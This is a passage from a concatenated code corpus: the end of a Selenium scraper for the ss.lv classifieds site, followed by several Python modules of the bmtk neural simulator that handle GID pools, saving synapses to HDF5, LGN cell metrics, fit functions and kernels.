raise Exception('Please set valid day filter') self.driver.get(subcategory_url) if days: days_xpath = "//select[@id='today_cnt_sl']/option[starts-with(text(), '%s')]" % self.post_date_filter.get(days) self.driver.find_element_by_xpath(days_xpath).click() data = [] # Dealing with pagination # 1 vs True - because it's faster in python 2.* while 1: items = self.driver.find_elements_by_xpath('//table//a[@class="am"]') data += [(i.text, i.get_attribute('href')) for i in items] # Does not find next button at all - not enough items for pagination try: next_button = self.driver.find_element_by_xpath('//a[@class="navi" and @rel="next"]') except exceptions.NoSuchElementException: break if not next_button.get_attribute('href').endswith('/'): next_button.click() else: # Next button links back to the first page break return data def get_post_details(self, post_url): """ Get post details :param post_url: post url :type: string :return: post detail dictionary :rtype: dict """ data = {} self.driver.get(post_url) delimiter = self.random(10) # Fixing bad quality html self.driver.execute_script(''.join(( 'var delimiter = document.createTextNode("' + delimiter + '");', 'var table = document.getElementsByClassName("options_list")[0];', 'table.parentNode.insertBefore(delimiter, table);', ))) data['url'] = post_url body = self.driver.find_element_by_id('msg_div_msg').text data['body'] = body.split(delimiter)[0] # Properties keys = self.driver.find_elements_by_class_name('ads_opt_name') keys = [k.text.replace(':', '') for k in keys] values = self.driver.find_elements_by_class_name('ads_opt') values = [v.text for v in values] data['properties'] = dict(zip(keys, values)) # Photos data['photos'] = [] thumbs = self.driver.find_elements_by_class_name('pic_thumbnail') for thumb in thumbs: try: thumb.click() except exceptions.WebDriverException: pass image = self.driver.find_element_by_id('msg_img') data['photos'].append(image.get_attribute('src')) # Price data['price'] = self.driver.find_element_by_xpath('//td[@class="ads_price"]').text # Fixing bad quality html try: self.driver.execute_script('document.querySelectorAll("[align=left]")[0].className = "ads_contacts";') except exceptions.WebDriverException: pass # Contacts keys = [k.text for k in self.driver.find_elements_by_xpath('//td[@class="ads_contacts_name"]')] values = [v.text for v in self.driver.find_elements_by_xpath('//td[@class="ads_contacts"]')] data['contacts'] = list(zip(keys, values)) return data if __name__ == '__main__': scraper = Scraper() print(scraper.get_categories()) print(scraper.get_subcategories('https://www.ss.lv/lv/transport/')) print(scraper.get_posts('https://www.ss.lv/lv/agriculture/agricultural-machinery/motoblocks/')) print(scraper.get_post_details('https://www.ss.lv/msg/lv/agriculture/agricultural-machinery/motoblocks/bxlcof.html')) ```
{ "source": "aaberbach/bmtk", "score": 3 }
#### File: simulator/bionet/gids.py ```python import numpy as np from collections import namedtuple PopulationID = namedtuple('PopulationID', 'node_id population') class GidPool(object): def __init__(self): # map from pool-id --> gid self._accumulated_offset = 0 self._pool_offsets = {} # map from gid --> pop, node_id self._offsets = np.array([0], dtype=np.uint64) self._offset2pool_map = {} def add_pool(self, name, n_nodes): offset_index = len(self._offsets) self._offset2pool_map[offset_index] = name self._offsets = np.append(self._offsets, np.array([self._accumulated_offset + n_nodes], dtype=np.uint64)) self._pool_offsets[name] = self._accumulated_offset self._accumulated_offset += n_nodes def get_gid(self, name, node_id): return int(self._pool_offsets[name] + node_id) def get_pool_id(self, gid): offset_indx = np.searchsorted(self._offsets, gid, 'right') node_id = gid - self._offsets[offset_indx-1] pool_name = self._offset2pool_map[offset_indx] return PopulationID(int(node_id), pool_name) ``` #### File: bionet/modules/save_synapses.py ```python import os import csv import h5py import numpy as np from neuron import h from glob import glob from itertools import product from .sim_module import SimulatorMod from bmtk.simulator.bionet.biocell import BioCell from bmtk.simulator.bionet.io_tools import io from bmtk.utils.sonata.utils import add_hdf5_magic, add_hdf5_version from bmtk.simulator.bionet.pointprocesscell import PointProcessCell pc = h.ParallelContext() MPI_RANK = int(pc.id()) N_HOSTS = int(pc.nhost()) class SaveSynapses(SimulatorMod): def __init__(self, network_dir, single_file=False, **params): self._network_dir = network_dir self._virt_lookup = {} self._gid_lookup = {} self._sec_lookup = {} if MPI_RANK == 0: if not os.path.exists(network_dir): os.makedirs(network_dir) pc.barrier() #if N_HOSTS > 1: # io.log_exception('save_synapses module is not current supported with mpi') self._syn_writer = ConnectionWriter(network_dir) def _print_nc(self, nc, src_nid, trg_nid, cell, src_pop, trg_pop, edge_type_id): if isinstance(cell, BioCell): sec_x = nc.postloc() sec = h.cas() sec_id = self._sec_lookup[cell.gid][sec] # cell.get_section_id(sec) h.pop_section() self._syn_writer.add_bio_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0], sec_id, sec_x) else: self._syn_writer.add_point_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0]) def initialize(self, sim): io.log_info('Saving network connections. This may take a while.') # Need a way to look up virtual nodes from nc.pre() for pop_name, nodes_table in sim.net._virtual_nodes.items(): for node_id, virt_node in nodes_table.items(): self._virt_lookup[virt_node.hobj] = (pop_name, node_id) # Need to figure out node_id and pop_name from nc.srcgid() for node_pop in sim.net.node_populations: pop_name = node_pop.name for node in node_pop[0::1]: if node.model_type != 'virtual': self._gid_lookup[node.gid] = (pop_name, node.node_id) for gid, cell in sim.net.get_local_cells().items(): trg_pop, trg_id = self._gid_lookup[gid] if isinstance(cell, BioCell): # sections = cell._syn_seg_ix self._sec_lookup[gid] = {sec_name: sec_id for sec_id, sec_name in enumerate(cell.get_sections_id())} else: sections = [-1]*len(cell.netcons) for nc, edge_type_id in zip(cell.netcons, cell._edge_type_ids): src_gid = int(nc.srcgid()) if src_gid == -1: # source is a virtual node src_pop, src_id = self._virt_lookup[nc.pre()] else: src_pop, src_id = self._gid_lookup[src_gid] self._print_nc(nc, src_id, trg_id, cell, src_pop, trg_pop, edge_type_id) self._syn_writer.close() pc.barrier() if N_HOSTS > 1 and MPI_RANK == 0: merger = H5Merger(self._network_dir, self._syn_writer._pop_groups.keys()) pc.barrier() io.log_info(' Done saving network connections.') class H5Merger(object): def __init__(self, network_dir, grp_keys): self._network_dir = network_dir self._grp_keys = list(grp_keys) self._edge_counts = {(s, t): 0 for s, t in self._grp_keys} self._biophys_edge_count = {(s, t): 0 for s, t in self._grp_keys} self._point_edge_count = {(s, t): 0 for s, t in self._grp_keys} self._tmp_files = {(s, t): [] for s, t in self._grp_keys} for (src_pop, trg_pop), r in product(self._grp_keys, range(N_HOSTS)): fname = '.core{}.{}_{}_edges.h5'.format(r, src_pop, trg_pop) fpath = os.path.join(self._network_dir, fname) if not os.path.exists(fpath): io.log_warning('Expected file {} is missing'.format(fpath)) h5file = h5py.File(fpath, 'r') edges_grp = h5file['/edges/{}_{}'.format(src_pop, trg_pop)] self._tmp_files[(src_pop, trg_pop)].append(edges_grp) self._edge_counts[(src_pop, trg_pop)] += len(edges_grp['source_node_id']) self._biophys_edge_count[(src_pop, trg_pop)] += len(edges_grp['0/syn_weight']) self._point_edge_count[(src_pop, trg_pop)] += len(edges_grp['1/syn_weight']) for (src_pop, trg_pop), in_grps in self._tmp_files.items(): out_h5 = h5py.File(os.path.join(self._network_dir, '{}_{}_edges.h5'.format(src_pop, trg_pop)), 'w') add_hdf5_magic(out_h5) add_hdf5_version(out_h5) pop_root = out_h5.create_group('/edges/{}_{}'.format(src_pop, trg_pop)) n_edges_total = self._edge_counts[(src_pop, trg_pop)] n_edges_bio = self._biophys_edge_count[(src_pop, trg_pop)] n_edges_point = self._point_edge_count[(src_pop, trg_pop)] pop_root.create_dataset('source_node_id', (n_edges_total, ), dtype=np.uint64) pop_root['source_node_id'].attrs['node_population'] = src_pop pop_root.create_dataset('target_node_id', (n_edges_total, ), dtype=np.uint64) pop_root['target_node_id'].attrs['node_population'] = trg_pop pop_root.create_dataset('edge_group_id', (n_edges_total, ), dtype=np.uint16) pop_root.create_dataset('edge_group_index', (n_edges_total,), dtype=np.uint16) pop_root.create_dataset('edge_type_id', (n_edges_total, ), dtype=np.uint32) pop_root.create_dataset('0/syn_weight', (n_edges_bio, ), dtype=np.float) pop_root.create_dataset('0/sec_id', (n_edges_bio, ), dtype=np.uint64) pop_root.create_dataset('0/sec_x', (n_edges_bio, ), dtype=np.float) pop_root.create_dataset('1/syn_weight', (n_edges_point, ), dtype=np.float) total_offset = 0 bio_offset = 0 point_offset = 0 for grp in in_grps: n_ds = len(grp['source_node_id']) pop_root['source_node_id'][total_offset:(total_offset + n_ds)] = grp['source_node_id'][()] pop_root['target_node_id'][total_offset:(total_offset + n_ds)] = grp['target_node_id'][()] pop_root['edge_group_id'][total_offset:(total_offset + n_ds)] = grp['edge_group_id'][()] pop_root['edge_group_index'][total_offset:(total_offset + n_ds)] = grp['edge_group_index'][()] pop_root['edge_type_id'][total_offset:(total_offset + n_ds)] = grp['edge_type_id'][()] total_offset += n_ds n_ds = len(grp['0/syn_weight']) # print(grp['0/syn_weight'][()]) pop_root['0/syn_weight'][bio_offset:(bio_offset + n_ds)] = grp['0/syn_weight'][()] pop_root['0/sec_id'][bio_offset:(bio_offset + n_ds)] = grp['0/sec_id'][()] pop_root['0/sec_x'][bio_offset:(bio_offset + n_ds)] = grp['0/sec_x'][()] bio_offset += n_ds n_ds = len(grp['1/syn_weight']) pop_root['1/syn_weight'][point_offset:(point_offset + n_ds)] = grp['1/syn_weight'][()] point_offset += n_ds fname = grp.file.filename grp.file.close() if os.path.exists(fname): os.remove(fname) self._create_index(pop_root, index_type='target') self._create_index(pop_root, index_type='source') out_h5.close() def _create_index(self, pop_root, index_type='target'): if index_type == 'target': edge_nodes = np.array(pop_root['target_node_id'], dtype=np.int64) output_grp = pop_root.create_group('indices/target_to_source') elif index_type == 'source': edge_nodes = np.array(pop_root['source_node_id'], dtype=np.int64) output_grp = pop_root.create_group('indices/source_to_target') edge_nodes = np.append(edge_nodes, [-1]) n_targets = np.max(edge_nodes) ranges_list = [[] for _ in range(n_targets + 1)] n_ranges = 0 begin_index = 0 cur_trg = edge_nodes[begin_index] for end_index, trg_gid in enumerate(edge_nodes): if cur_trg != trg_gid: ranges_list[cur_trg].append((begin_index, end_index)) cur_trg = int(trg_gid) begin_index = end_index n_ranges += 1 node_id_to_range = np.zeros((n_targets + 1, 2)) range_to_edge_id = np.zeros((n_ranges, 2)) range_index = 0 for node_index, trg_ranges in enumerate(ranges_list): if len(trg_ranges) > 0: node_id_to_range[node_index, 0] = range_index for r in trg_ranges: range_to_edge_id[range_index, :] = r range_index += 1 node_id_to_range[node_index, 1] = range_index output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64') output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64') class ConnectionWriter(object): class H5Index(object): def __init__(self, file_path, src_pop, trg_pop): # TODO: Merge with NetworkBuilder code for building SONATA files self._nsyns = 0 self._n_biosyns = 0 self._n_pointsyns = 0 self._block_size = 5 self._pop_name = '{}_{}'.format(src_pop, trg_pop) # self._h5_file = h5py.File(os.path.join(network_dir, '{}_edges.h5'.format(self._pop_name)), 'w') self._h5_file = h5py.File(file_path, 'w') add_hdf5_magic(self._h5_file) add_hdf5_version(self._h5_file) self._pop_root = self._h5_file.create_group('/edges/{}'.format(self._pop_name)) self._pop_root.create_dataset('edge_group_id', (self._block_size, ), dtype=np.uint16, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('source_node_id', (self._block_size, ), dtype=np.uint64, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root['source_node_id'].attrs['node_population'] = src_pop self._pop_root.create_dataset('target_node_id', (self._block_size, ), dtype=np.uint64, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root['target_node_id'].attrs['node_population'] = trg_pop self._pop_root.create_dataset('edge_type_id', (self._block_size, ), dtype=np.uint32, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('0/syn_weight', (self._block_size, ), dtype=np.float, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('0/sec_id', (self._block_size, ), dtype=np.uint64, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('0/sec_x', (self._block_size, ), chunks=(self._block_size, ), maxshape=(None, ), dtype=np.float) self._pop_root.create_dataset('1/syn_weight', (self._block_size, ), dtype=np.float, chunks=(self._block_size, ), maxshape=(None, )) def _add_conn(self, edge_type_id, src_id, trg_id, grp_id): self._pop_root['edge_type_id'][self._nsyns] = edge_type_id self._pop_root['source_node_id'][self._nsyns] = src_id self._pop_root['target_node_id'][self._nsyns] = trg_id self._pop_root['edge_group_id'][self._nsyns] = grp_id self._nsyns += 1 if self._nsyns % self._block_size == 0: self._pop_root['edge_type_id'].resize((self._nsyns + self._block_size,)) self._pop_root['source_node_id'].resize((self._nsyns + self._block_size, )) self._pop_root['target_node_id'].resize((self._nsyns + self._block_size, )) self._pop_root['edge_group_id'].resize((self._nsyns + self._block_size, )) def add_bio_conn(self, edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x): self._add_conn(edge_type_id, src_id, trg_id, 0) self._pop_root['0/syn_weight'][self._n_biosyns] = syn_weight self._pop_root['0/sec_id'][self._n_biosyns] = sec_id self._pop_root['0/sec_x'][self._n_biosyns] = sec_x self._n_biosyns += 1 if self._n_biosyns % self._block_size == 0: self._pop_root['0/syn_weight'].resize((self._n_biosyns + self._block_size, )) self._pop_root['0/sec_id'].resize((self._n_biosyns + self._block_size, )) self._pop_root['0/sec_x'].resize((self._n_biosyns + self._block_size, )) def add_point_conn(self, edge_type_id, src_id, trg_id, syn_weight): self._add_conn(edge_type_id, src_id, trg_id, 1) self._pop_root['1/syn_weight'][self._n_pointsyns] = syn_weight self._n_pointsyns += 1 if self._n_pointsyns % self._block_size == 0: self._pop_root['1/syn_weight'].resize((self._n_pointsyns + self._block_size, )) def clean_ends(self): self._pop_root['source_node_id'].resize((self._nsyns,)) self._pop_root['target_node_id'].resize((self._nsyns,)) self._pop_root['edge_group_id'].resize((self._nsyns,)) self._pop_root['edge_type_id'].resize((self._nsyns,)) self._pop_root['0/syn_weight'].resize((self._n_biosyns,)) self._pop_root['0/sec_id'].resize((self._n_biosyns,)) self._pop_root['0/sec_x'].resize((self._n_biosyns,)) self._pop_root['1/syn_weight'].resize((self._n_pointsyns,)) eg_ds = self._pop_root.create_dataset('edge_group_index', (self._nsyns, ), dtype=np.uint64) bio_count, point_count = 0, 0 for idx, grp_id in enumerate(self._pop_root['edge_group_id']): if grp_id == 0: eg_ds[idx] = bio_count bio_count += 1 elif grp_id == 1: eg_ds[idx] = point_count point_count += 1 self._create_index('target') self._create_index('source') def _create_index(self, index_type='target'): if index_type == 'target': edge_nodes = np.array(self._pop_root['target_node_id'], dtype=np.int64) output_grp = self._pop_root.create_group('indices/target_to_source') elif index_type == 'source': edge_nodes = np.array(self._pop_root['source_node_id'], dtype=np.int64) output_grp = self._pop_root.create_group('indices/source_to_target') edge_nodes = np.append(edge_nodes, [-1]) n_targets = np.max(edge_nodes) ranges_list = [[] for _ in range(n_targets + 1)] n_ranges = 0 begin_index = 0 cur_trg = edge_nodes[begin_index] for end_index, trg_gid in enumerate(edge_nodes): if cur_trg != trg_gid: ranges_list[cur_trg].append((begin_index, end_index)) cur_trg = int(trg_gid) begin_index = end_index n_ranges += 1 node_id_to_range = np.zeros((n_targets + 1, 2)) range_to_edge_id = np.zeros((n_ranges, 2)) range_index = 0 for node_index, trg_ranges in enumerate(ranges_list): if len(trg_ranges) > 0: node_id_to_range[node_index, 0] = range_index for r in trg_ranges: range_to_edge_id[range_index, :] = r range_index += 1 node_id_to_range[node_index, 1] = range_index output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64') output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64') def close_h5(self): self._h5_file.close() def __init__(self, network_dir): self._network_dir = network_dir self._pop_groups = {} def _group_key(self, src_pop, trg_pop): return (src_pop, trg_pop) def _get_edge_group(self, src_pop, trg_pop): grp_key = self._group_key(src_pop, trg_pop) if grp_key not in self._pop_groups: pop_name = '{}_{}'.format(src_pop, trg_pop) if N_HOSTS > 1: pop_name = '.core{}.{}'.format(MPI_RANK, pop_name) file_path = os.path.join(self._network_dir, '{}_edges.h5'.format(pop_name)) self._pop_groups[grp_key] = self.H5Index(file_path, src_pop, trg_pop) return self._pop_groups[grp_key] def add_bio_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight, sec_id, sec_x): h5_grp = self._get_edge_group(src_pop, trg_pop) h5_grp.add_bio_conn(edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x) def add_point_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight): h5_grp = self._get_edge_group(src_pop, trg_pop) h5_grp.add_point_conn(edge_type_id, src_id, trg_id, syn_weight) def close(self): for _, h5index in self._pop_groups.items(): h5index.clean_ends() h5index.close_h5() ``` #### File: filternet/lgnmodel/cellmetrics.py ```python import os import numpy as np import pandas as pd class SubclassMetricsCache(object): """Used to calc optimized parameteres for different types of cells using existing data that contains cell responses to different types of stimulus. The existing data should be stored in a single directory with a csv file for reach cell type. usage: subcell_metrics = SubclassMetricsCache('/path/to/observations/') """ def __init__(self, saved_metrics_dir=None): self._saved_metrics_dir = saved_metrics_dir if saved_metrics_dir is not None \ else os.path.join(os.path.dirname(__file__), 'cell_metrics') self._metrics_cache = {} # subclass_name --> metrics Dataframe, stores calculated params for each cell class @property def saved_metrics_dir(self): return self._saved_metrics_dir @saved_metrics_dir.setter def saved_metrics_dir(self, path): if not os.path.isdir(path): raise FileNotFoundError('{} directory not found.'.format(path)) self._saved_metrics_dir = path def get_metrics(self, subclass_type): """Calculates various parameters for a given cell class, using observations stored in saved_metrics_dir :param subclass_type: name of cell subclass types :return: A dictionary of parameters for various types of inputs """ if subclass_type in self._metrics_cache: # See if parameters for cell type have already been calculated return self._metrics_cache[subclass_type] else: subtype_metrics = self._load_metrics(subclass_type) self._metrics_cache[subclass_type] = subtype_metrics return subtype_metrics def _load_metrics(self, ctype): # Helpter function for get_metrics, calculates subtype parameters for the given cell-class type (ctype) if ctype.find('_sus') >= 0: prs_fn = os.path.join(self.saved_metrics_dir, '{}_cells_v3.csv'.format(ctype)) else: prs_fn = os.path.join(self.saved_metrics_dir, '{}_cell_data.csv'.format(ctype)) prs_df = pd.read_csv(prs_fn) N_class, nmet = np.shape(prs_df) # Group data by subclasses based on max F0 vals exp_df = prs_df.iloc[:, [13, 14, 17, 18, 28, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54]].copy() # Bl_lat,Wh_lat,Bl_si, wh_si, spont, 5 F0s, 5 F1s sub_df = exp_df.iloc[:, [5, 6, 7, 8, 9]] exp_df['max_tf'] = sub_df.idxmax(axis=1).values # sub_df.idxmax(axis=1) exp_means = exp_df.groupby(['max_tf']).mean() exp_std = exp_df.groupby(['max_tf']).std() exp_nsub = exp_df.groupby(['max_tf']).size() max_ind_arr = np.where(exp_nsub == np.max(exp_nsub)) max_nsub_ind = max_ind_arr[0][0] # Get means and std dev for subclasses exp_prs_dict = {} for scn in np.arange(len(exp_nsub)): f0_exp = exp_means.iloc[scn, 5:10].values f1_exp = exp_means.iloc[scn, 10:].values spont_exp = exp_means.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_exp = exp_means.iloc[scn, 2:3].values ttp_exp = exp_means.iloc[scn, 0:1].values elif ctype.find('ON') >= 0: si_exp = exp_means.iloc[scn, 3:4].values ttp_exp = exp_means.iloc[scn, 1:2].values else: si_exp = np.NaN * np.ones((1, 5)) ttp_exp = np.NaN * np.ones((1, 2)) nsub = exp_nsub.iloc[scn] if nsub == 1: f0_std = np.mean(exp_std.iloc[max_nsub_ind, 5:10].values) * np.ones((1, 5)) f1_std = np.mean(exp_std.iloc[max_nsub_ind, 10:].values) * np.ones((1, 5)) spont_std = np.mean(exp_std.iloc[max_nsub_ind, 4:5].values) * np.ones((1, 5)) if ctype.find('OFF') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 2:3].values) * np.ones((1, 5)) elif ctype.find('ON') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 3:4].values) * np.ones((1, 5)) else: si_std = np.NaN * np.ones((1, 5)) else: f0_std = exp_std.iloc[scn, 5:10].values f1_std = exp_std.iloc[scn, 10:].values spont_std = exp_std.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_std = exp_std.iloc[scn, 2:3].values elif ctype.find('ON') >= 0: si_std = exp_std.iloc[scn, 3:4].values else: si_std = np.NaN * np.ones((1, 5)) if ctype.find('t') >= 0: tcross = 40. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. - tcross - 40.)) elif ctype.find('s') >= 0: tcross = 60. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. - tcross - 40.)) else: si_inf_exp = np.nan dict_key = exp_means.iloc[scn].name[3:] exp_prs_dict[dict_key] = {} exp_prs_dict[dict_key]['f0_exp'] = f0_exp exp_prs_dict[dict_key]['f1_exp'] = f1_exp exp_prs_dict[dict_key]['spont_exp'] = spont_exp exp_prs_dict[dict_key]['si_exp'] = si_exp exp_prs_dict[dict_key]['si_inf_exp'] = si_inf_exp exp_prs_dict[dict_key]['ttp_exp'] = ttp_exp exp_prs_dict[dict_key]['f0_std'] = f0_std exp_prs_dict[dict_key]['f1_std'] = f1_std exp_prs_dict[dict_key]['spont_std'] = spont_std exp_prs_dict[dict_key]['si_std'] = si_std exp_prs_dict[dict_key]['nsub'] = nsub exp_prs_dict[dict_key]['N_class'] = N_class return exp_prs_dict # Creates/retrives a singleton for every difference _instances = {} @classmethod def load_dir(cls, saved_metrics_dir=None): if saved_metrics_dir in cls._instances: return cls._instances[saved_metrics_dir] else: metrics = cls(saved_metrics_dir) cls._instances[saved_metrics_dir] = metrics return metrics def get_data_metrics_for_each_subclass(ctype): metrics = SubclassMetricsCache.load_dir() return metrics.get_metrics(ctype) ``` #### File: filternet/lgnmodel/fitfuns.py ```python import os from math import * import numpy as np import numpy.fft as npft def makeFitStruct_GLM(dtsim, kbasprs, nkt, flag_exp): gg = {} gg['k'] = [] gg['dc'] = 0 gg['kt'] = np.zeros((nkt,1)) gg['ktbas'] = [] gg['kbasprs'] = kbasprs gg['dt'] = dtsim nkt = nkt if flag_exp==0: ktbas = makeBasis_StimKernel(kbasprs,nkt) else: ktbas = makeBasis_StimKernel_exp(kbasprs,nkt) gg['ktbas'] = ktbas gg['k'] = gg['ktbas']*gg['kt'] return gg def makeBasis_StimKernel(kbasprs, nkt): neye = kbasprs['neye'] ncos = kbasprs['ncos'] kpeaks = kbasprs['kpeaks'] kdt = 1 b = kbasprs['b'] delays_raw = kbasprs['delays'] delays = delays_raw[0].astype(int) ylim = np.array([100.,200.]) # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!HARD-CODED FOR NOW yrnge = nlin(ylim + b*np.ones(np.shape(kpeaks))) db = (yrnge[-1]-yrnge[0])/(ncos-1) ctrs = nlin(np.array(kpeaks)) # yrnge mxt = invnl(yrnge[ncos-1]+2*db)-b kt0 = np.arange(0, mxt, kdt) # -delay nt = len(kt0) e1 = np.tile(nlin(kt0 + b*np.ones(np.shape(kt0))), (ncos, 1)) e2 = np.transpose(e1) e3 = np.tile(ctrs, (nt, 1)) kbasis0 = [] for kk in range(ncos): kbasis0.append(ff(e2[:,kk],e3[:,kk],db)) #Concatenate identity vectors nkt0 = np.size(kt0, 0) a1 = np.concatenate((np.eye(neye), np.zeros((nkt0,neye))),axis=0) a2 = np.concatenate((np.zeros((neye,ncos)),np.array(kbasis0).T),axis=0) kbasis = np.concatenate((a1, a2),axis=1) kbasis = np.flipud(kbasis) nkt0 = np.size(kbasis,0) if nkt0 < nkt: kbasis = np.concatenate((np.zeros((nkt - nkt0, ncos + neye)), kbasis), axis=0) elif nkt0 > nkt: kbasis = kbasis[-1-nkt:-1, :] kbasis = normalizecols(kbasis) # Add delays for both functions. tack on delays (array of 0s) to the end of the function, then readjusts the second # function so both are the same size. kbasis2_0 = np.concatenate((kbasis[:, 0], np.zeros((delays[0], ))), axis=0) kbasis2_1 = np.concatenate((kbasis[:, 1], np.zeros((delays[1], ))), axis=0) len_diff = delays[1] - delays[0] kbasis2_1 = kbasis2_1[len_diff:] # combine and renormalize kbasis2 = np.zeros((len(kbasis2_0), 2)) kbasis2[:, 0] = kbasis2_0 kbasis2[:, 1] = kbasis2_1 kbasis2 = normalizecols(kbasis2) return kbasis2 def makeBasis_StimKernel_exp(kbasprs,nkt): ks = kbasprs['ks'] b = kbasprs['b'] x0 = np.arange(0,nkt) kbasis = np.zeros((nkt,len(ks))) for ii in range(len(ks)): kbasis[:,ii] = invnl(-ks[ii]*x0) # (1.0/ks[ii])* kbasis = np.flipud(kbasis) # kbasis = normalizecols(kbasis) return kbasis def nlin(x): eps = 1e-20 # x.clip(0.) return np.log(x+eps) def invnl(x): eps = 1e-20 return np.exp(x)-eps def ff(x, c, dc): rowsize = np.size(x,0) m = [] for i in range(rowsize): xi = x[i] ci = c[i] val=(np.cos(np.max([-pi, np.min([pi, (xi-ci)*pi/dc/2])])) + 1)/2 m.append(val) return np.array(m) def normalizecols(A): B = A/np.tile(np.sqrt(sum(A**2,0)),(np.size(A,0),1)) return B def sameconv(A,B): am = np.size(A) bm = np.size(B) nn = am+bm-1 q = npft.fft(A,nn)*npft.fft(np.flipud(B),nn) p = q G = npft.ifft(p) G = G[range(am)] return G ``` #### File: filternet/lgnmodel/kernel.py ```python import matplotlib as mpl from matplotlib import cm import numpy as np import matplotlib.pyplot as plt def find_l_r_in_t_range(t_range, t): for tl in range(len(t_range)-1): tr = tl+1 test_val = (t_range[tl]-t)*(t_range[tr]-t) if np.abs(test_val) < 1e-16: if np.abs(t_range[tl]-t) < 1e-16: return (tl,) else: return (tr,) elif test_val < 0: t_range[tl], t_range[tr], t return tl, tr def get_contour(X, Y, Z, c): contour_obj = plt.contour(X, Y, Z) res = contour_obj.trace(c) nseg = len(res) // 2 if nseg > 0: seg = res[:nseg][0] return seg[:, 0], seg[:, 1] else: return [], [] def plot_single_contour(ax, x_contour, y_contour, t, color): t_contour = t+np.zeros_like(x_contour) ax.plot(x_contour, t_contour, y_contour, zdir='z', color=color) class Kernel1D(object): def __init__(self, t_range, kernel_array, threshold=0., reverse=False): assert len(t_range) == len(kernel_array) kernel_array = np.array(kernel_array) inds_to_keep = np.where(np.abs(kernel_array) > threshold) if reverse: self.t_range = -np.array(t_range)[::-1] t_inds_tmp = inds_to_keep[0] max_t_ind = t_inds_tmp.max() reversed_t_inds = max_t_ind - t_inds_tmp self.t_inds = reversed_t_inds - max_t_ind - 1 # Had an off by one error here should be "- 1" nhc 14 Apr '17 change made in cursor evalutiate too else: self.t_range = np.array(t_range) self.t_inds = inds_to_keep[0] self.kernel = kernel_array[inds_to_keep] assert len(self.t_inds) == len(self.kernel) def rescale(self): if np.abs(self.kernel.sum())!=0: self.kernel /= np.abs(self.kernel.sum()) def normalize(self): self.kernel /= np.abs(self.kernel.sum()) def __len__(self): return len(self.kernel) def imshow(self, ax=None, show=True, save_file_name=None, ylim=None, xlim=None, color='b', reverse=True): if ax is None: _, ax = plt.subplots(1, 1) t_vals = self.t_range[self.t_inds] kernel_data = self.kernel if reverse: kernel_data = self.kernel[-1::-1] ax.plot(t_vals, kernel_data, color) ax.set_xlabel('Time (Seconds)') if ylim is not None: ax.set_ylim(ylim) if xlim is not None: ax.set_xlim(xlim) else: a, b = (t_vals[0], t_vals[-1]) ax.set_xlim(min(a, b), max(a, b)) if save_file_name is not None: ax.savefig(save_file_name, transparent=True) if show: plt.show() return ax, (t_vals, self.kernel) def full(self, truncate_t=True): data = np.zeros(len(self.t_range)) data[self.t_inds] = self.kernel if truncate_t: ind_min = np.where(np.abs(data) > 0)[0].min() return data[ind_min:] else: return data return data class Kernel2D(object): def __init__(self, row_range, col_range, row_inds, col_inds, kernel): self.col_range = np.array(col_range) self.row_range = np.array(row_range) self.row_inds = np.array(row_inds) self.col_inds = np.array(col_inds) self.kernel = np.array(kernel) assert len(self.row_inds) == len(self.col_inds) assert len(self.row_inds) == len(self.kernel) def rescale(self): if np.abs(self.kernel.sum()) != 0: self.kernel /= np.abs(self.kernel.sum()) def normalize(self): self.kernel /= np.abs(self.kernel.sum()) @classmethod def from_dense(cls, row_range, col_range, kernel_array, threshold=0.): col_range = np.array(col_range).copy() row_range = np.array(row_range).copy() kernel_array = np.array(kernel_array).copy() inds_to_keep = np.where(np.abs(kernel_array) > threshold) kernel = kernel_array[inds_to_keep] if len(inds_to_keep) == 1: col_inds, row_inds = np.array([]), np.array([]) else: col_inds, row_inds = inds_to_keep return cls(row_range, col_range, row_inds, col_inds, kernel) @classmethod def copy(cls, instance): return cls(instance.row_range.copy(), instance.col_range.copy(), instance.row_inds.copy(), instance.col_inds.copy(), instance.kernel.copy()) def __mul__(self, constant): new_copy = Kernel2D.copy(self) new_copy.kernel *= constant return new_copy def __add__(self, other): if len(other) == 0: return self try: np.testing.assert_almost_equal(self.row_range, other.row_range) np.testing.assert_almost_equal(self.col_range, other.col_range) except: raise Exception('Kernels must exist on same grid to be added') row_range = self.row_range.copy() col_range = self.col_range.copy() kernel_dict = {} for key, ker in zip(zip(self.row_inds, self.col_inds), self.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker for key, ker in zip(zip(other.row_inds, other.col_inds), other.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker key_list, kernel_list = zip(*kernel_dict.items()) row_inds_list, col_inds_list = zip(*key_list) row_inds = np.array(row_inds_list) col_inds = np.array(col_inds_list) kernel = np.array(kernel_list) return Kernel2D(row_range, col_range, row_inds, col_inds, kernel) def apply_threshold(self, threshold): inds_to_keep = np.where(np.abs(self.kernel) > threshold) self.row_inds = self.row_inds[inds_to_keep] self.col_inds = self.col_inds[inds_to_keep] self.kernel = self.kernel[inds_to_keep] def full(self): data = np.zeros((len(self.row_range), len(self.col_range))) data[self.row_inds, self.col_inds] = self.kernel return data def imshow(self, ax=None, show=True, save_file_name=None, clim=None, colorbar=True): from 